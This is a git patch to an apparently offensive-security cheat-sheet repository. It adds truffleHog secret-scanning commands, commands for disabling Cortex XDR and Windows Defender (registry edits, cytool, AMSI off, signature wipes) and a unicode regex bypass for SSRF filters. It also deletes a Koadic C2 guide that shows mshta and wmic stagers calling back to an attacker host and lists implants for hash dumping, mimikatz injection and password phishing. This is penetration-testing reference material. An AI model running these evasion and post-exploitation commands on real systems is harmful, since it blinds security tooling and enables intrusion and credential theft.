From b0d05faded8f0e7b8fa0cab98f503a2178fda18b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Apr 2022 09:42:15 +0200 Subject: [PATCH] TruffleHog examples + Cortex XDR disable --- API Key Leaks/README.md | 7 + .../Windows - Persistence.md | 40 +++++- .../Windows - Post Exploitation Koadic.md | 123 ------------------ Server Side Request Forgery/README.md | 6 + 4 files changed, 49 insertions(+), 127 deletions(-) delete mode 100644 Methodology and Resources/Windows - Post Exploitation Koadic.md diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index acfb662..8438d2c 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -25,6 +25,13 @@ - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) + ```ps1 + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + trufflehog git https://github.com/trufflesecurity/trufflehog.git + trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 + ``` ## Exploit diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index a95bd6f..8154ab5 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y Elastic Agent has been uninstalled. ``` +* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) + ```ps1 + # Global uninstall password: Password1 + Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db + Look for PasswordHash, PasswordSalt or password, salt strings. + + # Disable Cortex: Change the DLL to a random value, then REBOOT + reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f + + # Disables the agent on startup (requires reboot to work) + cytool.exe startup disable + + # Disables protection on Cortex XDR files, processes, registry and services + cytool.exe protect disable + + # Disables Cortex XDR (Even with tamper protection enabled) + cytool.exe runtime disable + + # Disables event collection + cytool.exe event_collection disable + ``` ### Disable Windows Defender @@ -73,19 +94,30 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install +# Disable scanning all downloaded files and attachments, disable AMSI (reactive) +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +PS C:\> Set-MpPreference -DisableIOAVProtection $true +# Disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f + +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + +# Remove signatures (if Internet connection is present, they will be downloaded again): +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` + ### Disable Windows Firewall ```powershell diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md deleted file mode 100644 index 9caea72..0000000 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ /dev/null @@ -1,123 +0,0 @@ -# Koadic C3 COM Command & Control - JScript RAT - -> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. - -## Installation - -```powershell -git clone https://github.com/zerosum0x0/koadic -git submodule init -git submodule update -pip2.7 install -r requirements.txt --user -python2.7 koadic -``` - -## Set a listener - -```powershell -use stager/js/mshta -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] mshta http://192.168.1.19:4444/6DX7f -``` - -```powershell -use stager/js/wmic -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" -``` - -### Stagers - -Stagers hook target zombies and allow you to use implants. - -Module | Description ---------|------------ -stager/js/mshta | serves payloads using MSHTA.exe HTML Applications -stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets -stager/js/wmic | serves payloads using WMIC XSL -stager/js/rundll32_js | serves payloads using rundll32.exe -stager/js/disk | serves payloads using files on disk - - - -## List zombies and interact with them - -```powershell -(koadic: sta/js/wmic)$ zombies - - ID IP STATUS LAST SEEN - --- --------- ------- ------------ - 0 192.168.1.30 Alive 2018-10-04 17:07:12 - -(koadic: sta/js/wmic)$ zombies 0 - ID: 0 - Status: Alive - First Seen: 2018-10-04 17:05:00 - Last Seen: 2018-10-04 17:14:42 - IP: 192.168.1.30 - User: DESKTOP-68URA9U\CrashWin - [...] - Elevated: No - [...] -``` - -Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. - -```powershell -[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami -[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. -[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. -Result for `cd C:\Users\CrashWin & whoami`: -desktop-68ura9u\crashwin -``` - -## Use an implant - -Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. - -```powershell -(koadic: sta/js/mshta)$ use implant/phish/password_box -(koadic: imp/phi/password_box)$ set ZOMBIE 1 -(koadic: imp/phi/password_box)$ run -Input contents: -MyStrongPassword123! -``` - -### Implants - -Implants start jobs on zombies. - -Module | Description ---------|------------ -implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. -implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. -implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. -implant/fun/voice | Plays a message over text-to-speech. -implant/gather/clipboard | Retrieves the current content of the user clipboard. -implant/gather/enum_domain_info | Retrieve information about the Windows domain. -implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. -implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. -implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). -implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). -implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). -implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). -implant/manage/enable_rdesktop | Enables remote desktop on the target. -implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. -implant/phishing/password_box | Prompt a user to enter their password. -implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. -implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. -implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. -implant/utils/download_file | Downloads a file from the target zombie. -implant/utils/multi_module | Run a number of implants in succession. -implant/utils/upload_file | Uploads a file from the listening server to the target zombies. - -## References - -- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) -- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5c..a16cb7d 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,6 +223,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +### Bypass using unicode + +In some languages (.NET, Python 3) regex supports unicode by default. +`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. + + ### Bypass filter_var() php function ```powershell